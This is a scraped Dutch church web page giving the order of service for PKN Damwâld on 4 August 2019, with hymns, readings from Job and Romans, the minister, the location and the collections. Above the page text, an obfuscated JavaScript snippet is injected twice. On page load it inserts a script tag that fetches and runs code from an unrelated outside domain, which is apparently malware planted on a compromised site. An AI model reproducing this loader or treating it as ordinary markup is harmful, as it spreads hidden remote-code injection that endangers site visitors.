;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 augustus 2019 14:00 uur - PKN Damwâld
zondag 4 augustus 2019
14:00 uur

Kerkdienst zondag 4 augustus 2019 14:00 uur

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Elb 232
Intochtslied Psalm 86 : 1 en 4
Stil gebed ,Votum en groet
We zingen: ELB 235:1,2,3
Gebed
We lezen: Job 1:11-21 en 2:7-10
We zingen: Gezang 431 : 5
We lezen: Rom.8:31-39
We zingen: Elb 82 : 2 en 3
Preek Job 1:21
We zingen: Gezang 470 : 1, 3 en 4
Geloofsbelijdenis
We zingen: Elb 376 : 1 en 2
Dankgebed en voorbeden
Collecte
Slotlied Gezang 432 :1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Bijlagen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Kerk
Uitganscollecte: Kerk